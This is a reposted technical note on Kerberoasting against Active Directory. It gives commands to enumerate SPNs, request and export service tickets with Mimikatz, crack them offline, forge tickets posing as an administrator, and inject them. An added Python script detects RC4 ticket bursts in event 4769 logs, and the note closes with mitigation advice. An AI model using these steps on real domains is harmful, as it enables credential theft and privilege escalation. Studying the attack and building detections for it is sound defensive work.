Kerberos attacks

References:
1. http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/
2. https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
3. https://github.com/nidem/kerberoast

Method:
1. Find service accounts (enumerate registered SPNs)
setspn -T DOMAINNAME -F -Q */*

2. Pick out user accounts and ignore machine accounts; machine account passwords are normally not crackable
3. Request a service ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

The general form is:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/YOURKERBSERVER"

4. Use Mimikatz to export the tickets from RAM
mimikatz# kerberos::list /export

5. Crack the service account password offline
tgsrepcrack.py -w wordlist.txt *.kirbi

6. Rewrite the ticket so the user appears as another user
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500

Or add the user to a group (in this example the admin group)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512

7. Use Mimikatz to inject the ticket into memory
kerberos::ptt sql.kirbi
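Every step above leaves a trace on the domain controller: each service ticket request is logged as Security event 4769, and a cracking-oriented request asks for an RC4-HMAC (encryption type 0x17) ticket because that is the cheapest to brute-force offline. The script below is an added detection example, not code from the original post or from the kerberoast project. It parses a constructed, pipe-delimited export of 4769 fields (the column layout is an assumption; map your own SIEM export onto it) and flags accounts that obtained RC4 service tickets for several distinct service accounts within a short window, which is what steps 3 and 4 produce when run against a list of SPNs. Machine accounts and krbtgt are skipped for the same reason the post skips them.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example, not part of the original post. Input format is a constructed
assumption: one record per line, fields separated by '|':
  time|requesting account|client IP|Service Name|TicketEncryptionType|status
Map the real 4769 fields (Account Name, Client Address, Service Name,
Ticket Encryption Type, Failure Code) onto these columns when exporting.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export. Service Name in 4769 is the service account's
# sAMAccountName (machine accounts end in '$'); 0x12 is AES256, 0x17 is RC4.
SAMPLE_LOG = """\
2014-09-26T10:00:01|alice@MEDIN.LOCAL|10.0.0.5|WEB01$|0x12|0x0
2014-09-26T10:00:03|bob@MEDIN.LOCAL|10.0.0.9|sqlsvc|0x17|0x0
2014-09-26T10:00:04|bob@MEDIN.LOCAL|10.0.0.9|websvc|0x17|0x0
2014-09-26T10:00:05|bob@MEDIN.LOCAL|10.0.0.9|sql02svc|0x17|0x0
2014-09-26T10:00:06|bob@MEDIN.LOCAL|10.0.0.9|backupsvc|0x17|0x0
2014-09-26T10:00:07|bob@MEDIN.LOCAL|10.0.0.9|DC01$|0x17|0x0
2014-09-26T10:30:00|carol@MEDIN.LOCAL|10.0.0.7|websvc|0x17|0x0
2014-09-26T10:31:00|DC01$@MEDIN.LOCAL|10.0.0.1|krbtgt|0x12|0x0
"""

RC4_HMAC = "0x17"
SUCCESS = "0x0"


def parse_events(text):
    """Turn the pipe-delimited export into a list of dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, ip, service, enc, status = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "account": account,
            "client_ip": ip,
            "service": service,
            "enc_type": enc.lower(),
            "status": status.lower(),
        })
    return events


def is_roastable_service(service):
    """Machine accounts ('$' suffix) and krbtgt are not Kerberoasting targets:
    their keys are long and random, so tickets for them are noise here."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_services=3):
    """Return {account: set(service names)} for accounts that obtained RC4
    service tickets for at least min_services distinct roastable service
    accounts inside any sliding window of the given length."""
    by_account = defaultdict(list)
    for ev in events:
        if (ev["enc_type"] == RC4_HMAC and ev["status"] == SUCCESS
                and is_roastable_service(ev["service"])):
            by_account[ev["account"]].append(ev)

    findings = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            # Distinct services requested within `window` of this event.
            services = {e["service"] for e in evs[i:]
                        if e["time"] - start["time"] <= window}
            if len(services) >= min_services:
                findings[account] = services
                break
    return findings


def rc4_ticket_requesters(events):
    """Lower-confidence signal: every account that got any RC4 ticket for a
    roastable service. Useful to review after forcing AES on service accounts."""
    return sorted({e["account"] for e in events
                   if e["enc_type"] == RC4_HMAC and is_roastable_service(e["service"])})


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for acct, services in find_kerberoast_candidates(evs).items():
        print(f"Kerberoasting pattern: {acct} requested RC4 tickets for "
              f"{len(services)} service accounts: {sorted(services)}")
    print("All RC4 requesters for review:", rc4_ticket_requesters(evs))
```

The strongest mitigation this detection leans on is making RC4 the exception: when service accounts have AES keys (or are group managed service accounts with random 120-character passwords), a 0x17 ticket request for a non-machine service is rare enough to alert on by itself, and the offline cracking in step 5 has nothing weak to crack.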


Reposted from j4s0nh4ck.iteye.com/blog/2167213